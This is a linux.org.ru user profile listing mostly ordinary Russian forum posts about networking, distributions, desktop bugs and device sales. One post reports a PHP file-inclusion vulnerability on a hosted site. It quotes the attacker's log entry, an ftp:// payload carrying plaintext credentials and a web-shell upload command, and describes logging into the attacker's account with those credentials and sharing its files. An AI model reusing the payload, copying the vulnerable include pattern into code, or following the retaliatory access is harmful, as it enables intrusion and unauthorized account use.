LINUX.ORG.RU

Сообщения RommeDeSerieux

 

Ad-hoc mesh in userspace

Стоит задача соединить несколько мобильных устройств в сеть с помощью ad-hoc wi-fi (без точки доступа то есть, а именно с только одним вайфай-роутером, работающем в ad-hoc режиме).

Вопрос: есть ли реализации mesh-сетей чисто в userspace, чтобы без драйверов и виртуальных сетевых интерфейсов? Допустим, дал ты этой чудо-либе открытый udp сокет, а оно бы туда слало бродкасты соседним нодам. Пускать в сеть Internet Explorer мне этим способом не надо, только собственную программу, которую ещё предстоит написать.

 

RommeDeSerieux
()

Сертификация ФСТЭК

Ко мне обратились за консультацией по стоимости одобренного путином линукса, зашёл на altlinux.ru (единственный, который знаю), потыкался в поисках цен и не нашёл оных: видимо, действует тактика «позвоните нам, а мы выжмем из вас как можно больше денег».

В связи с этим вопросы: какой дистрибутив, сертифицированный ФСТЭК, наиболее адекватен? И о каких деньгах идёт речь?

RommeDeSerieux
()

Избавлюсь от Alcatel OneTouch 997D

Цена вопроса - 5 000, куплен вчера, при ближайшем рассмотрении дома он мне разонравился (интерфейс не слишком шустрый). Местонахождение - ДС2.

 

RommeDeSerieux
()

Дистрибутив для роутера

Это уже не первый тред на эту тему, но посоветованный в прошлом треде zeroshell, похоже, был успешно заброшен разработчиком, поэтому осмелюсь создать новый.

Необходим роутер, отвечающий следующим требованиям:

  • Не freebsd
  • Балансировка нагрузки или хотя бы failover для внешних соединений
  • Приоритет по выделению канала для определённых хостов
  • Гуй для настройки правил файрвола
  • Гуй для настройки VPN
  • Блокировка p2p, ограничение количества соединений

Заранее спасибо.

RommeDeSerieux
()

Продам Samsung Galaxy Nexus в ДС-2

15 000, на гарантии, полный комплект, обновлён до вендроида 4.1.

 

RommeDeSerieux
()

[барахолка] Samsung Omnia W

Купил этот девайс и понял, что установленная там система мне слегка не по душе. Поэтому специальная цена для лора - 8 000.

 

RommeDeSerieux
()

Продам Samsung SyncMaster P2770HD

27 дюймов, работает в качестве быдлоящика (в комплекте есть пульт) и монитора. Единственная проблема — отсутствие коробки, в которой он поставлялся.

http://market.yandex.ru/model.xml?hid=91052&modelid=5072903&show-uid=46315371...

http://dl.dropbox.com/u/268483/09052011117.jpg

Цена — 10 000, регион — Питер

RommeDeSerieux
()

Бразильский крякер

Имею несчастье размещать у себя сайт, написанный командой жутких быдлокодеров, которые даже вирусы со своей венды поудалять нормально не могут, не говоря уже о том, чтобы писать вменяемый php-код. Примерно раз в неделю мне приходит письмо от хостера о том, что на сайте вновь обнаружена малварь: то exe-шник с вирусом, то копия сайта банка. В прошлые разы вредоносный контент попадал на сайт через вирус, который слушал сетевой трафик в винде и ловил в незашифрованном ftp логин и пароль, отсылая их владельцу, который уже закачивал на сайт что хотел.

Но в этот раз было что-то новое: похоже, доступ к файлам сайта взломщик таки потерял, но там как у него была возможность изучить код сайта ранее, найти уязвимость там не составило труда. Уязвимый кусок выглядел так:

if(file_exists($helloworld)) {
    include($helloworld);
}

где $helloworld берётся из $_GET. Если попробовать подставить туда http-ссылку, то include() не выполнится: file_exists() всегда возвращает false для таких ссылок. Остаётся ftp, что и видно в заботливо предоставленных хостером логах:

189.24.109.181 - - [27/Apr/2011:19:52:52 +0400] "POST
/index.php?id=ftp://tramponovo1:lucas123@ftp.webcindario.com/jm.php?http://www.jak.com/manual/CVS/.../rhe.ganteng?&action=upload&chdir=/www/***/users/***-***ru/www/htdocs/fame/
HTTP/1.0" 200 31520
"http://***.ru/index.php?id=ftp://tramponovo1:lucas123@ftp.webcindario.com/jm.php?http://www.jak.com/manual/CVS/.../rhe.ganteng?&chdir=/www/***/users/***-***ru/www/htdocs/fame/"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.2.16) Gecko/20110319
Firefox/3.6.16"

Похоже, взломщику стало лень настраивать публичный ftp и он решил подсунуть уязвимому скрипту свой. Как результат - засвеченный пароль. Пароль подошёл, и я сначала скачал содержимое его аккаунта, а потом удалил, оставив записку. Собственно, в его содержимом и заключается смысл этого топика: вдруг там есть что-нибудь интересное, что поможет насолить крякеру, просматривать же 68 файлов у меня сейчас нет никакого желания.

Файлы взломщика: http://ge.tt/6ZCiOU0?c

Пароль к архиву - gregore

RommeDeSerieux
()

Хочу попробовать гном3

Киньте, пожалуйста, ссылкой на livecd третьего гнома с проприетарными драйверами от nvidia. Моя видеокарта не дружит с Nouveau и радует серым экраном, после чего картинка появляется только после перезагрузки, и до следующей попытки включить Nouveau.

RommeDeSerieux
()

Шрифты в java swing

Возможно ли настроить сглаживание шрифтов в Swing-приложениях так, чтобы оно было идентично системному? Сейчас наблюдаю в них full hinting, хотя надо slight hinting: http://i.imgur.com/3Zwym.png

RommeDeSerieux
()

Продам андроида

Купил недавно сдуру LG GT540 и понял, что это не для меня. Слишком неудобно набирать на экранной клавиатуре, да и к симбиану с его традиционной многозадачностью слишком привык. Собственно продаю, цену предложите сами, город - ДС2.

RommeDeSerieux
()

fedora.org взломан?

RommeDeSerieux
()

[ubuntu] wi-fi и блокировка экрана

Когда я блокирую экран, чтобы отойти куда-нибудь, то в большинстве случаев, когда я возвращаюсь и ввожу свой пароль, меня встречает неработающий вайфай. Чиню выключением вайфая аппаратным переключателем на ноутбуке и включением снова. Кто-нибудь уже побеждал такой баг?

 

RommeDeSerieux
()

Что значит владеть продуктом Apple

RommeDeSerieux
()

Ubuntu 10.04, виртуальные консоли

После обновления до 10.04 Xorg больше не перехватывает сочетания клавиш Alt + F[1-12], что ведёт к переглючению на другую виртуальную консоль. Как вглючить эту функцию обратно?

RommeDeSerieux
()

Дружественный к Linux телефон

Существуют ли в природе телефоны, производители которых выпускали бы какой-нибудь софт для синхронизации своих поделий с линуксом? Достаточно было бы календаря, контактов и смс-ок. Неофициальные программы, сделанные сообществом в расчёт не берём.

RommeDeSerieux
()

камера или датчик движения?

Обнаружил у себя в кабинете следующее устройство: http://imgur.com/tAzQQ.jpg

Что бы это могло быть?

RommeDeSerieux
()

Аппаратное ускорение во флэше

Поддерживает ли десятый Flash Player аппаратное ускорение и как убедиться, что оно у меня используется?

RommeDeSerieux
()

Читалка rss, не висящая в области уведомлений

Существует ли в природе читалка rss, которая не занимала бы место в области уведомлений всё время, а появлялась лишь когда есть новые записи. Подобным образом ведёт себя mail-notification, но он для почты.

RommeDeSerieux
()

[gtk] Расставить виджеты в виде строки

Есть ли что-то вроде HBox, но умеющее выстраивать виджеты в несколько рядов? GtkTable не подходит, так как там другое ограничение — обязательная сетка, а нужно, чтобы было как в тексте.

 

RommeDeSerieux
()

RSS подписка на новые темы